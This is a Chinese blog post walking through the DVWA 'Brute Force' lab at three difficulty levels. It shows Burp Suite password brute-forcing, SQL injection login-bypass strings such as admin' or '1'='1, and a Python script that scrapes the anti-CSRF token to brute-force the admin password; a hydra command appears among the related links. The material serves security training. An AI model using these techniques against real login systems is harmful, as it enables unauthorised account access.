网络攻击与防御之Brute Force

最新推荐文章于 2023-03-22 11:37:23 发布
最新推荐文章于 2023-03-22 11:37:23 发布
阅读量476 收藏 1
点赞数
分类专栏: 网络攻击与防御 文章标签: 网络攻击与防御
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40708753/article/details/84335578
版权

参考网站:
https://www.freebuf.com/articles/web/116437.html
(一)Brute Force
Low
Low级别的代码服务器只是验证了参数Login是否被设置(isset函数在php中用来检测变量是否设置,该函数返回的是布尔类型的值,即true/false),没有任何的防爆破机制,且对参数username、password没有做任何过滤,存在明显的sql注入漏洞。
漏洞利用:
方法一:爆破利用burpsuite完成。
1. 抓包。
在这里插入图片描述
2. ctrl+I将包复制到intruder模块,因为要对password参数进行爆破,所以在password参数的内容两边加$。
在这里插入图片描述
3. 选中Payloads,载入字典,点击Start attack进行爆破。
在这里插入图片描述
4. 尝试在爆破结果中找到正确的密码,可以看到password的响应包长度(length)与其他响应包不一样,可推测password为正确密码,手工验证登陆成功。
在这里插入图片描述
在这里插入图片描述
方法二手工sql注入
1. Username: admin’ or ‘1’='1
Password:(空)
在这里插入图片描述
注入成功。
2. Username :admin’#
Password:(空)
在这里插入图片描述

注入成功。
Medium
相比Low级别的代码,Medium级别的代码主要增加了mysql_real_escape_string函数,这个函数会对字符串中的特殊符号(x00,n,r,,’,”,x1a)进行转义,基本上能够抵御sql注入攻击,说基本上是因为查到说 MySQL5.5.37以下版本如果设置编码为GBK,能够构造编码绕过mysql_real_escape_string 对单引号的转义(因实验环境的MySQL版本较新,所以并未做相应验证);同时,$pass做了MD5校验,杜绝了通过参数password进行sql注入的可能性。但是,依然没有加入有效的防爆破机制(sleep(2)算不上)。
漏洞利用:
虽然sql注入不再有效,但依然可以使用Burpsuite进行爆破,与Low级别的爆破方法基本一样,不赘述。
High
High级别的代码加入了Token,可以抵御CSRF攻击,同时也增加了爆破的难度,通过抓包,可以看到,登录验证时提交了四个参数:username、password、Login以及user_token。
在这里插入图片描述
每次服务器返回的登陆页面中都会包含一个随机的user_token的值,用户每次登录时都要将user_token一起提交。服务器收到请求后,会优先做token的检查,再进行sql查询。

漏洞利用:

  1. python写脚本,代码如下。

-- coding:utf-8 --

import re
import requests

header = {‘Host’: ‘localhost’,
‘Upgrade-Insecure-Requests’: ‘1’,
‘User-Agent’: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) ’
‘AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36’,
‘Accept’: ‘text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8’,
‘Referer’: ‘http://localhost:8080/dvwa/vulnerabilities/brute/’,
‘Accept-Encoding’: ‘gzip, deflate’,
‘Accept-Language’: ‘zh-CN,zh;q=0.9’,
‘Cookie’: ‘security=high; PHPSESSID=ov604p8hhtovo2holl5mn77f67’,
‘Connection’: ‘close’}

file = open(‘D:\pyt\test.txt’, ‘r’)
url = ‘http://localhost:8080/dvwa/vulnerabilities/brute/
dvwa_session = requests.Session()
for line in file:
resp = dvwa_session.get(url, headers=header)
# 使用正则表达式 获取提交 token
token = re.search(r’[a-z0-9]{32}’, resp.text).group()
# print 'user_token : ', token
password = line.rstrip()
url2 = ‘http://localhost:8080/dvwa/vulnerabilities/brute/index.php?username=admin&password=’ + password +
‘&Login=Login&user_token=’ + str(token)
# print url
resp = dvwa_session.get(url2, headers=header)
print (“密码:%s 页面长度:%s” % (password.strip(), len(resp.text)))
file.close()
2. 备用密码
在这里插入图片描述
3. cmd执行,真正密码的页面长度与其他的不一样。
在这里插入图片描述
成功!

薛定谔的卷卷子
关注
专栏目录
网络攻击之-暴力破解/密码喷射流量告警运营分析篇
村中少年的专栏
12-29 1247
通过列举SSH,SMB,RDP,MYSQL,PGSQL,Kerberos,NTLM等登录认证的数据包,讲解暴力破解的检测,研判分析以及处置建议等
常用网站攻击手段及防御方法
奮鬥徳菜鳥
07-29 1万+
电子商务网站,互联网的安全防御相当重要,尤其是牵扯到支付这一块的。本文总结了一些比较通用的 web 安全防御常识,供大家参考一下
DVWA系列之13 Brute Force代码分析与防御
weixin_33905756的博客
12-14 218
之前已经分析过了low级别的Brute Force代码,下面再分别分析一下medium和high级别的代码。medium级别代码:很明显就可以看到medium和low级别的区别,在这里对负责接收用户参数的变量$user和$pass进行了过滤,过滤的方法仍然是使用mysql_real_escape_string()函数。这样密码绕过就行不通了,但对于暴力破解却是没有丝毫影响,利用Burpsuite仍...
DVWA 之暴力破解攻击(Brute Force
弱弱的小雨鸟
01-14 1万+
暴力破解(Brute Force)的意思是攻击者借助计算机的高速计算不停枚举所有可能的用户名和密码,直到尝试出正确的组合,成功登录系统。理论上,只要字典足够大,破解总是会成功的。阻止暴力破解的最有效方式是设置复杂的密码(英文字母大小写、数字、符号混合)。而如果你的字典是从某网站泄露出来的,你使用它试图登陆其他网站,就便是撞库。撞库攻击的成功率高于暴力破解,因为你在A网站的用户名、密码通常和B网站的
如何用 Charles 抓 HTTPS 的包?其中原理和流程是什么?什么又是中间人攻击?
iOS_开发
11-10 664
Linux编程点击右侧关注,免费入门到精通!作者丨彭序猿https://www.jianshu.com/p/210c296eb836如何用 Charles 抓 HTTPS...
什么是重放攻击,怎样防止它_什么是蛮力攻击以及如何防止这种攻击?
culu1614的博客
08-08 993
什么是重放攻击,怎样防止它 什么是蛮力攻击? (What is Brute Force Attack?) Brute force attack is a very common method, it is nothing but a simple script used to crack the password. The script uses every possible character ...
前端安全问题——暴破登录
最新发布
Jack, what else can you do besides holding your little darling?
03-22 2484
声明:本文仅供学习和研究用途,请勿用作违法犯罪之事,若违反则与本人无关。暴力破解登录是一种常见的前端安全问题,属于未授权访问安全问题的一种,攻击者尝试使用不同的用户名和密码组合来登录到受害者的账户,直到找到正确的用户名和密码组合为止。攻击者可以使用自动化工具,如字典攻击、暴力攻击等来加快攻击速度。这种攻击通常针对用户使用弱密码、没有启用多因素身份验证等情况。
Brute Force(暴力破解)
kid的博客
04-23 6773
Brute Force(暴力破解) 前言 主要针对dvwa的Brute Force做一个练习,学习了解Brute Force。 主要会用到brupsuite和hydra两个工具。 练习 Low 可以看到下面是暴力破解的界面,但看到这个界面我第一反应是先尝试sql注入(最近在一个靶场练习,里面有道sql注入也是这种用户登录,而且暂时还没搞定…,后面搞定再写篇博客讲讲菜鸡的辛酸泪…),言归正传,我们还...
dvwa学习-brute force(暴力破解)
qq_17762247的博客
05-09 1839
一、简介: Brute-Force(暴力破解),又称为穷举攻击,是一种密码分析的方法,即将密码进行逐个推算直到找出真正的密码为止。例如:一个已知是四位数并且全部由阿拉伯数字组成的密码,其可能共有10000种组合,因此最多尝试9999次就能找到正确的密码。理论上除了具有完善保密性的密码以外,利用这种方法可以破解任何一种密码,问题只在于如何缩短试误时间。有些人运用计算机来增加效率,有些人透过字典攻击来...
20201225DVWA暴力破解(Brute Force)模块全难度详解
qq_45290991的博客
12-30 676
一、low级别 low级别直接用BP爆破就好了,先看源码: Brute Force Source vulnerabilities/brute/source/low.php <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5(
DVWA V1.9:Brute Force(暴力破解)
qq_43233085的博客
01-22 626
DVWA V1.9:暴力破解Brute Force 介绍Low 级别核心代码官方提示漏洞利用Medium 级别High 级别Impossible 级别 Brute Force 介绍 密码破解是从计算机系统中存储或传输的数据中恢复密码的过程。 一种常见的方法是反复尝试对密码进行猜测。 用户经常选择弱密码。 不安全选择的例子包括字典中发现的单个单词、姓氏、任何太短的密码(通常被认为小于6或7个字符)或...
BruteForceExcelWorkbookPassword:曾经忘记过Excel工作簿的密码吗? 我也不! 但是有些人会
05-23
BruteForceExcelWorkbookPassword 曾经忘记过Excel工作簿的密码吗? 我也不! 但是有些人这样做。 将此脚本放在与工作簿相同的目录中并运行它。 您可以将工作簿名称作为指向单词列表的链接来传递,但默认使用该列表。 . / BruteForceExcelWorkbookPassword.ps1 " book1.xlsx " " https://raw.githubusercontent.com/openethereum/wordlist/master/res/wordlist.txt " 免责声明 这可能需要很长时间,而且如果不在单词列表中,也可能永远找不到密码。 密码,例如book1.xslx 至少我认为是“密码”。 试试看。
WLAN拒绝服务攻击与防御研究
01-01
1. **蛮力(brute force)攻击**: - 发送大量数据包,耗尽网络资源。 - 使用强大无线电信号占据无线信道。 2. **基于包的DoS攻击**:利用网络上其他计算机向服务器发送大量无用的数据包,加重网络负荷。 3. **无线...
登录接口防攻击 02
hw1287789687的专栏
06-03 305
可以参考前一篇博客:http://hw1287789687.iteye.com/blog/2215776   我们先考虑一种机器自动攻击的情形: 比如攻击者通过程序,每10秒钟访问登录接口,并且用户名和密码都一样,当然密码是错误的. 如何防止这种攻击呢? 方案一: (1)登录失败,则开始计数; (2)判断失败次数是否超过10(次数可以定制),若超过,则直接返回response c...
Brute Force(暴力破解)
qq_42176207的博客
05-05 638
Brute Force 暴力破解,是指攻击者使用账号或密码字典,使用穷举法猜解出用户账号或口令,是广泛使用的攻击手法。理论上利用这种方法可以破解任何一种密码,问题只在于如何缩短试误的时间。有些人运用计算机来增加效率,有些人辅以字典来缩小密码组合的范围。 可以在DVWA Security设置等级 Low 后端的代码 //Brute Force Source //vulnerabilities/brute/source/low.php <?php //获取账号密码时,未对用户的输入做过滤和限制,很明显
patator mysql 字典_利用patator进行子域名爆破
weixin_35468857的博客
01-19 254
前言:原来朋友写的一个子域名爆破工具挺好用,这前几天API接口关了.痛苦万分.自己也写了一个类似的但是不咋稳定.特地google找了下 找到一款patator.效果和速度还是不错的。knock的速度真心受不了啊patator是由Python写的 不用安装下载即可.下载地址:http://code.google.com/p/patator/软件是模块化 功能还是很强大的。目前支持以下模式:* ftp...
kali:OWASP DVWA Vulnerability: Brute Force 暴力破解的具体实现
lm19770429的专栏
08-05 1573
首先给出正确的暴力破解命令: hydra -l admin -P /usr/share/wordlists/metasploit/password.lst 10.10.10.143 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:Username and/or password incorrect.:H=Cookie: security=low;PHPSESS.
dvwa_Brute Force(暴力破解) _High
yaowink的博客
05-11 1000
dvwa_Brute Force(暴力破解) _High 首先,进入DVWA Security 改impossible为high并提交。返回Brute Force 点击View Source,发现与low的区别在于引入checkToken这条函数 checkToken函数:过滤一些较为低级的爆破 注:之前就用账号和密码两个数值,用checkToken的话,你从服务器上,它会下发一个参数到你的终端,当你用账号密码去登录的时候,实际上是你已经先打开了它这个网站,它会先把这个checkT...
RDP远程登录 Windows server系统
热门推荐
qq_40907977的博客
02-29 1万+
使用 RDP 文件登录 Windows 实例 目录 操作场景 适用本地操作系统 前提条件 操作步骤 Windows 系统使用 RDP 登录 Linux 系统使用 RDP 登录 MacOS 系统使用 RDP 登录 操作场景 RDP 是 Remote Desktop Protocol 的缩写,是微软开发的一个多通道的协议,帮助您的本地计算机连上远程计算机。RDP 作为腾讯云推荐登录您 Window...
Brute-Force与KMP算法解析
public static int bruteForce(String source, String sub) { int j = 0, i = 0, index = -1; while (i () && j ()) { if (source.charAt(i) == sub.charAt(j)) { i++; j++; } else { i = i - j + 1; // 回退i...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值